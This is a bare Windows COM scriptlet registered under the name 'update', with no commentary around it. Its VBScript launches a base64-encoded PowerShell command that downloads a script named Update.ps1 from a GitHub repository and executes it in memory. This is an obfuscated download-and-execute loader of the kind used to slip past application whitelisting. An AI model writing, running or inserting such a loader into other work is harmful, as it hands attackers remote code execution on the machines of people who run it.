<?XML version="1.0"?>
<scriptlet>
<registration 
progid="update"
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<script language="VBScript">
<![CDATA[
Dim r
r = "powershell -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AZgByAGsAbgBvAHoAcgAvAG0AeQBUAGUAcwB0AHMALwBtAGEAcwB0AGUAcgAvAFUAcABkAGEAdABlAC4AcABzADEAJwApAA=="
Set oShell = CreateObject ("WScript.Shell")
oShell.exec(r)
]]>
</script>
</registration>
</scriptlet>
